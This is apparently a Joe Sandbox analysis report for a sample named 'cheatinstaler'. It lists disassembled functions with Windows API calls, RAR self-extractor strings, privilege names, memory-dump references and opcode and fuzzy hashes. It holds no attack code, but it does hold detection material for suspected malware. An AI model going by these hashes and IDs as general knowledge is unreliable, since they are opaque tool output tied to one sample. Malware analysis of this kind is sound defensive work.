                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,00007FF6C16E1573,?,?,?,00007FF6C16E192A), ref: 00007FF6C16E162B
                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6C16E1573,?,?,?,00007FF6C16E192A), ref: 00007FF6C16E1648
                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6C16E1573,?,?,?,00007FF6C16E192A), ref: 00007FF6C16E1664
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                  • API String ID: 667068680-1718035505
                                                                                                  • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                                  • Instruction ID: 5b684fe76926ffebe920be323c576466bd697cb8f1c418c4426aa60e4958cf1e
                                                                                                  • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                                  • Instruction Fuzzy Hash: 8E116120A09B1382FF548F13AD502741395AF49797F5C4635C8EDC6394EE3CE595BA50
                                                                                                  Function 00007FF6C16CED24 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16C51A4: GetVersionExW.KERNEL32 ref: 00007FF6C16C51D5
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C16B5AB4), ref: 00007FF6C16CED8C
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C16B5AB4), ref: 00007FF6C16CED98
                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C16B5AB4), ref: 00007FF6C16CEDA8
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C16B5AB4), ref: 00007FF6C16CEDB6
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C16B5AB4), ref: 00007FF6C16CEDC4
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C16B5AB4), ref: 00007FF6C16CEE05
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                                  • String ID:
                                                                                                  • API String ID: 2092733347-0
                                                                                                  • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                                  • Instruction ID: 74ac9f58692c0e92590e616c3f9b90fd6a39daacbd15b87b5751167ad5a64242
                                                                                                  • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                                  • Instruction Fuzzy Hash: 57519EB2B106518BEB14CFBAD8501AC37B1F748B89B60803ADE9D97B58DF38E555CB40
                                                                                                  Function 00007FF6C16CF010 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                                  • String ID:
                                                                                                  • API String ID: 2092733347-0
                                                                                                  • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                                  • Instruction ID: a57c8d27d5cccb244c6df24154574c4c33b858494dacae6939438b43d81488e6
                                                                                                  • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                                  • Instruction Fuzzy Hash: 75315C66B10A51CDFB00CFB6D8901AC3770FF08759B54502AEE9D93A58EF38D995C700
                                                                                                  Function 00007FF6C16C7918 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: .rar$exe$rar$sfx
                                                                                                  • API String ID: 3668304517-630704357
                                                                                                  • Opcode ID: 2fc35cbdd70ebaba8229e08f8487c40f3259a53efddd90ef8447a9b59f22dcea
                                                                                                  • Instruction ID: c24581aa3c15cfb5bcf7c059f599a1cbcae58582ec510f7a02bd67cdd243819a
                                                                                                  • Opcode Fuzzy Hash: 2fc35cbdd70ebaba8229e08f8487c40f3259a53efddd90ef8447a9b59f22dcea
                                                                                                  • Instruction Fuzzy Hash: 6CA1D422A14A0644EF00AF6BD8652BC6361BF50B99F405235DEDD877E5DF3CE591E380
                                                                                                  Function 00007FF6C16E5CE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: abort$CallEncodePointerTranslator
                                                                                                  • String ID: MOC$RCC
                                                                                                  • API String ID: 2889003569-2084237596
                                                                                                  • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                                  • Instruction ID: 00440f84cfcb17866d892305629807a04d5cd80ae669b0eeaa3fed45c2fe73a7
                                                                                                  • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                                  • Instruction Fuzzy Hash: 2491C177A08B85CAE750CF66D8402AD7BA0FB04789F104229EECC87759DF38D295DB40
                                                                                                  Function 00007FF6C16E4F80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                  • String ID: csm$f
                                                                                                  • API String ID: 2395640692-629598281
                                                                                                  • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                                  • Instruction ID: 754fac1f9d851ca5a9c4d66d64506e0c9240664bb340aac2450e25d39075f6c7
                                                                                                  • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                                  • Instruction Fuzzy Hash: D051B536A19602C6DB14CF17EC44A693795FF40B8AF518234EADE87748DF78EA41E780
                                                                                                  Function 00007FF6C16BCEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                  • API String ID: 2102711378-639343689
                                                                                                  • Opcode ID: 6c1d5a5d5395298d9d74f6f4ee4569930d238c95dd33962f37e3fdaa32d53d1a
                                                                                                  • Instruction ID: 6765a49aaaec8713726db9a4a1f49bafd633fdbe4504fa5333daa1d654bcb508
                                                                                                  • Opcode Fuzzy Hash: 6c1d5a5d5395298d9d74f6f4ee4569930d238c95dd33962f37e3fdaa32d53d1a
                                                                                                  • Instruction Fuzzy Hash: 9751F062F0874285FB00DF66D8612BD23A1AF847EAF100135EEDD97696DE3CE586E240
                                                                                                  Function 00007FF6C16D7B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Show$Rect
                                                                                                  • String ID: RarHtmlClassName
                                                                                                  • API String ID: 2396740005-1658105358
                                                                                                  • Opcode ID: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                                                                                                  • Instruction ID: b62f9620e28d43fc47305f3c5a80846b9a795203266579c16d787e2d2fb64e2f
                                                                                                  • Opcode Fuzzy Hash: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                                                                                                  • Instruction Fuzzy Hash: 25517132A08B828AEB25DF27E45437AA3A0FF85785F244535DACE87B55DF3CE0459700
                                                                                                  Function 00007FF6C16DFED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                  • API String ID: 0-56093855
                                                                                                  • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                                  • Instruction ID: 05f172dbac91d1a87e77ba9f7ccabc91d8683c856310efb81b067383c3231d0c
                                                                                                  • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                                  • Instruction Fuzzy Hash: 7321F82590CB4B80FB109F1BF85417463A1AB49B8AF7404B6D9CDC7365DE3CE189E350
                                                                                                  Function 00007FF6C16EBFB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                                  • Instruction ID: 2d2cc6e7420ebcc504d40281de4b75ca8647ac4a384d126f78546b49b797a0ff
                                                                                                  • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                                  • Instruction Fuzzy Hash: 4AF06221B19A4281EF448F12F8443796760EF887DAF441135E9DF86764DE3DE598D700
                                                                                                  Function 00007FF6C16F45C0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 3215553584-0
                                                                                                  • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                                  • Instruction ID: 04b3457528f83f650fac08e23248e8d37ee0d4a9ca4a98f70f1f83851ba5b124
                                                                                                  • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                                  • Instruction Fuzzy Hash: D881CB22F1865289F7209F6788807BD27A0BB45B8AF414135DEEE93B95CF3CE445E718
                                                                                                  Function 00007FF6C16C3AF8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 2398171386-0
                                                                                                  • Opcode ID: 14fdea18fdcf977c61dce6ecaccc8aa35300d093acc7d7c713630260d7cb0aba
                                                                                                  • Instruction ID: 32a274c72c4f7ef2b3a3d6ed41834184f949448ae79f7d0ed61e469b44684998
                                                                                                  • Opcode Fuzzy Hash: 14fdea18fdcf977c61dce6ecaccc8aa35300d093acc7d7c713630260d7cb0aba
                                                                                                  • Instruction Fuzzy Hash: E151BF22B04A4259FF50AF66E8503BD23B1BB847A9F008635DEED877D4DF3895559300
                                                                                                  Function 00007FF6C16F3F34 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 3659116390-0
                                                                                                  • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                                  • Instruction ID: 65382b871cb024eb7156e60256aa71ede3b6b9a5c42cf00042b9f74b95dbfc69
                                                                                                  • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                                  • Instruction Fuzzy Hash: BF51BB32B18A5189E710CF66E8403AC3BB5FB58B99F048235CEDA97B98DF38D156D704
                                                                                                  Function 00007FF6C16E1E00 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                                  • String ID:
                                                                                                  • API String ID: 262959230-0
                                                                                                  • Opcode ID: 55eea0222137253c860f73f771396d48486a61dcff80d6f5aaddb46a2ec13fc8
                                                                                                  • Instruction ID: da9cab897c44d6dbe6b2881ddf457a2de69e0d0d405e25a7ee3e4350ce3646fa
                                                                                                  • Opcode Fuzzy Hash: 55eea0222137253c860f73f771396d48486a61dcff80d6f5aaddb46a2ec13fc8
                                                                                                  • Instruction Fuzzy Hash: 8141C031A0964689EB149F2798403782295FF49BA6F184734EAEDC77D5DF3CE241A380
                                                                                                  Function 00007FF6C16EF414 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
